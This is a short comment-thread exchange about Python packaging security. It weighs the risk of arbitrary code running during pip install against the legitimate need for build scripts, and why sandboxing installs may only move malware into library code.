djh, 1 month ago

@sethmlarson My hunch was always that 3rd party dependencies (PyPI) were the weakest link in the Python ecosystem.

If I pip install something today, during that installation arbitrary code can run with 1) full access to the filesystem and 2) network access, no?

I always wondered why that's treated as OK and there's very little to nothing out there taking care e.g. of sandboxing?

I'm not up to date here, tho, anything moving in this regard?

sethmlarson, 1 month ago

@djh Many packaging ecosystems have "build scripts" to access tools and libraries outside of the packaging ecosystem for legitimate reasons.

Sandboxing the build/install means malware authors will move the malicious code from the install stage to the library code itself for when you inevitably run the code you just installed

This is why removing build scripts/isolating them to just virtualenv doesn't seem like a great trade-off considering the utility build scripts offer.